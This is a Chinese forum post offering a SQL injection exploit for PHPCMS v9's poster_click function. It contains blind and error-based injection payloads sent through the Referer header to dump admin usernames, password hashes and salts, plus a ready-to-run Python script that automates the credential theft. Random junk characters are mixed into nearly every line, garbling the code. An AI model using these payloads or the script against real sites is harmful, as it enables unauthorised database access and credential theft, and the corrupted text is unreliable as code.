有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
) {+ ^8 u N1 j4 }; E3 e( W$ ?6 b9 b
& `0 l: X3 O0 H3 M问题函数\phpcms\modules\poster\index.php8 c1 o7 F7 O4 l6 Q2 ?; M e
9 b" p! O% }: a+ L' f$ K
public function poster_click() {
" x. Z; x& m; x x. D& T1 r! I0 y. Z$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
& @/ B) o8 ^2 e% p$r = $this->db->get_one(array('id'=>$id));
( e6 T* c/ K, u0 P/ _if (!is_array($r) && empty($r)) return false;
, N, c9 l6 g" I. B0 T- M$ip_area = pc_base::load_sys_class('ip_area');* e2 X4 |0 {9 Q0 J1 P+ o
$ip = ip();
3 i% h+ ?5 V8 \/ Z1 T$area = $ip_area->get($ip);( y3 [& H) G5 W% V
$username = param::get_cookie('username') ? param::get_cookie('username') : '';1 c( `' ~5 M, a( x
if($id) {, o* k- R" [' ?# r' D
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
5 i& C: W5 T8 g1 Y$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));1 H; n. j" z9 Z- v$ l+ z: i( `- u
}
/ M& `( d. U) x3 u0 w$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
A; T P' A8 w2 `: w- _* B5 }$setting = string2array($r['setting']);- d9 _3 B& P; l: L5 s
if (count($setting)==1) {( g% A0 ]7 E, L
$url = $setting['1']['linkurl'];( ^0 [4 G, A& m
} else {6 \6 J( {7 b8 D7 G+ p P
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
3 L8 D. v0 |' U3 u8 J# f+ }}5 \5 X! \$ X0 w* _5 F
header('Location: '.$url);
9 c% N8 c2 D2 ~! l8 B}# H3 I, k; t3 S& l
; c% D% C; f* b. v9 J
0 b2 G: p& P& f2 {2 H) v" I
) r3 m: H1 [5 A; ^# G. Q) a+ E" Q5 ~利用方式:7 y' o$ a# @ _& j
( i8 r% J5 } K5 K, c
1、可以采用盲注入的手法:0 W0 \+ `, t- U/ h6 l# J2 {
/ I$ T! F: ~4 N8 n9 @: u4 x
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)## S% C& P: M! h0 F
( [( h3 M: }" ^8 `# e3 a% x通过返回页面,正常与否一个个猜解密码字段。
: A6 X1 B. \1 d3 D! M4 r! i3 n4 N$ p
2、代码是花开写的,随手附上了: Q) P! |7 w' |
* Z" X4 b1 d) y5 Y- a% E: j
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
1 }: n1 V0 A, p8 S: u0 K
9 ~/ k: H( n1 `/ Q7 G此方法是爆错注入手法,原理自查。5 B$ e, m) j1 ?) J: \5 l' T8 h
[8 F. d) ?( c2 x$ z5 Z9 c) l2 e
9 i) S7 B6 K' r$ D4 w( y" V7 o. [2 G; Z* t. c) q4 ]- c
利用程序:6 U+ W9 y- `& ]+ E* w5 ?
( S1 |# H- t. ]" P+ N) n
#!/usr/bin/env python
8 n5 P% [. w, u4 A' E. E% l; Q' Bimport httplib,sys,re+ x* h/ p$ M- k y1 H# @; e0 K
$ R0 U$ ~9 a4 B, \* cdef attack():! p" k) \7 p8 J2 r. s
print “Code by Pax.Mac Team conqu3r!”
& Z! S0 b: ^! q: Cprint “Welcome to our zone!!!”
6 C# Y% j. s8 e) Turl=sys.argv[1]4 m' g9 k) M7 @+ A& w* t
paths=sys.argv[2]
9 ? E6 Z( u9 |. \4 }# t0 ~conn = httplib.HTTPConnection(url)
/ v, u2 P6 S" d7 D4 l! zi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
9 w; C4 l, @# |% a“Accept”: “text/plain”,3 K) {, m) f2 X9 N; r' d4 x1 \
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
4 l" w& y1 Y5 n" [( M% Iconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
4 z+ S, R9 l( P/ ^- a: d. lr1 = conn.getresponse()8 _! @ I! I3 l5 {- ^
datas=r1.read()6 l' J C1 N5 g2 j, ]7 k
datas=re.findall(r”Duplicate entry \’\w+’”, datas)5 B6 S* m. `, r, |, L
print datas[0]+ q6 L* w6 M' d2 [9 n$ n4 @
conn.close()
' a1 I& \# K) F& n" ? A; Uif __name__==”__main__”:
# M0 {# ~' i( dif len(sys.argv)<3:
& Q3 d& l: Q6 H! iprint “Code by Pax.Mac Team conqu3r”& U! B6 W. O" q
print “Usgae:”2 a# z% b& K: ]' n g
print “ phpcmsattack.py www.paxmac.org /”
) D4 K' U! E! s: a; oprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”# Y% i" {; G3 n; M( r5 a
sys.exit(1)
! P5 d+ ?3 {$ `attack()
% B6 V2 \ \ Z
! m. _# U' P/ V$ n1 H2 L# T |
发表于 2013-1-11 21:01:00
收藏
支持
反对